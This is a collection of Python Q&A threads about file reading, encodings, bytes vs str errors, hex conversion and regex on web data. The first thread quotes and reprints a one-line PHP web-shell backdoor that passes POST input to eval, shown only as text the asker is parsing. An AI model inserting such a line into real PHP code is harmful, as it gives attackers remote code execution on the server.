Read a file with illegal characters in Python - python-3.x

I am trying to read a PHP file in Python that has illegal characters. The string is the following:
z��m���^r�^if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}
I am using the following code to strip out the illegal characters, but it doesn't seem to be working:
EncodedString = Input.encode("ascii", "ignore")
Input = EncodedString.decode()
It results in the following string which throws an error
^r^if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}
The error message is
line 480, in t_ANY_error
raise SyntaxError('illegal character', (None, t.lineno, None, t.value))
File "<string>", line 2
How can I fix this? I don't want to do it in the file being read because that would defeat the purpose of what I am trying to accomplish.

The resulting characters are within the ASCII range, so the encode method worked just fine.
Your problem is that there are still characters you must get rid of because they cannot be interpreted by your software.
My guess is that you want to keep everything after the last ^, which leads to the following code:
Input = "z��m���^r�^if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}"
EncodedString = Input.encode("ascii", "ignore")
Input = EncodedString.decode().split('^')[-1]
print(Input)
# if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}
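If splitting on the last ^ is too specific for your input, a more general variant (my own sketch, not from the answer above) is to strip the ASCII control characters themselves; the raw string below is a stand-in with explicit control bytes, since the original bytes are not recoverable from the question:

```python
import re

def strip_nonprintable(text: str) -> str:
    """Drop non-ASCII bytes, then remove remaining ASCII control characters."""
    ascii_only = text.encode("ascii", "ignore").decode()
    # \x00-\x1f and \x7f cover control characters such as a literal ^R (0x12)
    return re.sub(r"[\x00-\x1f\x7f]", "", ascii_only)

raw = "z\x12m\x1fif(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}"
print(strip_nonprintable(raw))
```

Note this keeps printable garbage such as the leading zm, so you may still need to trim a prefix depending on what your parser accepts.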


Count the number of characters in a file

The question:
Write a function file_size(filename) that returns a count of the number of characters in the file whose name is given as a parameter. You may assume that when being tested in this CodeRunner question your function will never be called with a non-existent filename.
For example, if data.txt is a file containing just the following line: Hi there!
A call to file_size('data.txt') should return the value 10. This includes the newline character that will be added to the line when you're creating the file (be sure to hit the 'Enter' key at the end of each line).
What I have tried:
def file_size(data):
    """Count the number of characters in a file"""
    infile = open('data.txt')
    data = infile.read()
    infile.close()
    return len(data)
print(file_size('data.txt'))
# data.txt contains 'Hi there!' followed by a newline character
I get the correct answer for this file, but I fail a test that uses a larger/longer file whose character count should be 81, and I still get 10. I am trying to get the code to count the correct size of any file.
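No answer was posted, but the bug is visible in the snippet: the function ignores its parameter (which is then immediately overwritten by the read) and always opens the hard-coded 'data.txt', so every call reports that one file's count. A sketch of a fix:

```python
def file_size(filename):
    """Return the number of characters in the file named by the parameter."""
    with open(filename) as infile:
        return len(infile.read())
```

Using the `with` statement also removes the need for an explicit close() call.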

How to print string with embedded whitespace in python3

Assume the following string:
s = '\r\nthis is the second line\r\n\tthis line is indented\r\n'
If I run Python (v. 3.8.6) interactively, printing this string works as expected:
>>> print(s)
this is the second line
this line is indented
>>>
But when I print this string to a file (ie, print(s, file = "string.txt")), the embedded whitespace is not interpreted and the text file contains the string literally (with "\t" instead of a tab, etc).
How can I get the same interactive output written to file? Attempts using str(), f-strings, and format() were unsuccessful.
This worked for me:
with open('file.txt', 'w') as file:
    print('\r\nthis is the second line\r\n\tthis line is indented\r\n', file=file)
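The same idea with the asker's s variable, for completeness; the key point is that file= expects an open file object, not a filename string. Passing newline='' is an optional extra that keeps the \r\n pairs from being translated on write:

```python
s = '\r\nthis is the second line\r\n\tthis line is indented\r\n'
# file= takes a file object; open the file first, then print into it
with open('string.txt', 'w', newline='') as out:
    print(s, file=out)
```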

generate a hex file by converting strings into hex from a text file in Python

I have a Python tool that generates a text file in which each line is a string. I want to generate a hex file from this text file. The file has lines like the following:
-5.139488050547036391e-01
3.181812818225058681e+00
475.465798764
abc[0]
abc[0]*abc[10]
I tried using binascii.hexlify(b'<String>'), which works when I manually enter the strings, but when I do that:
with open("strings.txt", "r") as a_file:
    for line in a_file:
        if not line.strip():
            continue
        stripped_line = line.strip()
        hex_ = binascii.hexlify(b'<' + stripped_line + '>')
        print(hex_)
I get this error:
TypeError: can't concat str to bytes
How can I convert those strings of different types into hex and generate a .hex file?
To convert a string (a line in the file) to a bytes object you have to encode it. In your case, that only means replacing this line of your code
hex_ = binascii.hexlify(b'<' + stripped_line + '>')
with this line:
hex_ = binascii.hexlify(stripped_line.encode())
Your code ran into an error because you tried to concatenate b'<' (a bytes object) with stripped_line (a str object), which is not allowed in Python.
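Putting it together, a sketch of the full loop that writes one hex line per input string. The output file name out.hex is my assumption, and a tiny strings.txt is created inline here so the example is self-contained:

```python
import binascii

# tiny sample input, standing in for the tool's generated strings.txt
with open("strings.txt", "w") as f:
    f.write("abc[0]\n\n475.465798764\n")

with open("strings.txt") as a_file, open("out.hex", "w") as out:
    for line in a_file:
        stripped_line = line.strip()
        if not stripped_line:
            continue  # skip blank lines
        # encode() turns the str into the bytes that hexlify requires;
        # decode() turns the hex bytes back into text for writing
        out.write(binascii.hexlify(stripped_line.encode()).decode() + "\n")
```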

a bytes-like object is required, not 'str': typeerror in compressed file

I am searching for a substring in a compressed file using the following Python script, and I am getting "TypeError: a bytes-like object is required, not 'str'". Please can anyone help me fix this?
from re import *
import re
import gzip
import sys
import io
import os
seq = {}
with open(sys.argv[1], 'r') as fh:
    for line1 in fh:
        a = line1.split("\t")
        seq[a[0]] = a[1]
        abcd = "AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTG"
        print(a[0], "\t", seq[a[0]])
count = {}
with gzip.open(sys.argv[2]) as gz_file:
    with io.BufferedReader(gz_file) as f:
        for line in f:
            for b in seq:
                if abcd in line:
                    count[b] += 1
for c in count:
    print(c, "\t", count[c])
fh.close()
gz_file.close()
f.close()
and input files are
TruSeq2_SE AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTG
the second file is compressed text file. The line "if abcd in line:" shows the error.
The "BufferedReader" class gives you bytestrings, not text strings - you can't directly compare the two types in Python 3.
Since these strings use just a few ASCII characters and are not actually text, you can work with byte strings throughout your code.
So, whenever you open a file (not with gzip.open), open it in binary mode, i.e.
open(sys.argv[1], 'rb') instead of 'r'.
Also prefix your hardcoded string with a b so that Python uses a byte string internally: abcd = b"AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTG" - this will avoid a similar error on your if abcd in line - though the error message would differ from the one you presented.
Alternatively, work with everything as text - this gives you more string methods (Python 3's byte strings are somewhat limited) and nicer presentation of data when printing, and should not be much slower. In that case, instead of the changes suggested above, add an extra line to decode each line fetched from your data file:
with io.BufferedReader(gz_file) as f:
    for line in f:
        line = line.decode("latin1")
        for b in seq:
(Besides the error, your program logic seems to be a bit faulty, as you don't actually use a variable string in your innermost comparison - just the fixed abcd value - but I suppose you can fix that once you get rid of the errors.)
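Pulling these suggestions together, a sketch of the counting loop with the byte-string fixes applied. To keep it self-contained it builds a tiny gzip file inline instead of reading sys.argv, initialises count so the += cannot raise a KeyError (a second latent bug in the original), and compares seq[b] rather than the fixed abcd, per the logic remark above:

```python
import gzip

# sample data standing in for the asker's two input files
seq = {"TruSeq2_SE": b"AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTG"}
with gzip.open("reads.gz", "wb") as f:
    f.write(b"AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTGxxxx\nother line\n")

count = {b: 0 for b in seq}          # initialise so += cannot fail
with gzip.open("reads.gz", "rb") as gz_file:
    for line in gz_file:             # lines are bytes in binary mode
        for b in seq:
            if seq[b] in line:       # bytes compared with bytes
                count[b] += 1

for c in count:
    print(c, "\t", count[c])
```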

Extracting source code from html file using python3.1 urllib.request

I'm trying to extract data from an HTML file using regular expressions, with the following code:
import re
import urllib.request
def extract_words(wdict, urlname):
    uf = urllib.request.urlopen(urlname)
    text = uf.read()
    print(text)
    match = re.findall("<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
which returns an error:
File "extract.py", line 33, in extract_words
match = re.findall("<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
File "/usr/lib/python3.1/re.py", line 192, in findall
return _compile(pattern, flags).findall(string)
TypeError: can't use a string pattern on a bytes-like object
Upon experimenting further in the IDLE, I noticed that uf.read() does return the HTML source code the first time I invoke it. From then on, however, it returns an empty b''. Is there any way to get around this?
uf.read() will only read the contents once. Then you have to close it and reopen it to read it again. This is true for any kind of stream. This is however not the problem.
The problem is that reading from any kind of binary source, such as a file or a webpage, will return the data as a bytes type, unless you specify an encoding. But your regexp is not specified as a bytes type, it's specified as a unicode str.
The re module will quite reasonably refuse to use unicode patterns on byte data, and the other way around.
The solution is to make the regexp pattern a bytes string, which you do by putting a b in front of it. Hence:
match = re.findall(rb"<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
Should work. Another option is to decode the text so it is also a unicode str. In Python 3 the charset comes from get_content_charset() (getparam is the Python 2 name):
encoding = uf.headers.get_content_charset()
text = text.decode(encoding)
match = re.findall(r"<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
(Also, to extract data from HTML, I would say that lxml is a better option).
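A minimal illustration of the bytes-pattern point, runnable without a network connection (the HTML fragment is made up for the demonstration, with the pattern's character classes simplified):

```python
import re

data = b"<tr>\n<td>alpha beta</td>\n  <td>gamma</td>\n</tr>"
# an rb"..." pattern is both raw (no escape warnings for \s, \w)
# and bytes, so it can be applied directly to bytes data
match = re.findall(rb"<tr>\s*<td>([\w\s]+)</td>\s+<td>([\w\s]+)</td>\s*</tr>", data)
print(match)
```

Note that the groups come back as bytes too, so downstream code must expect b'...' values unless it decodes them.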
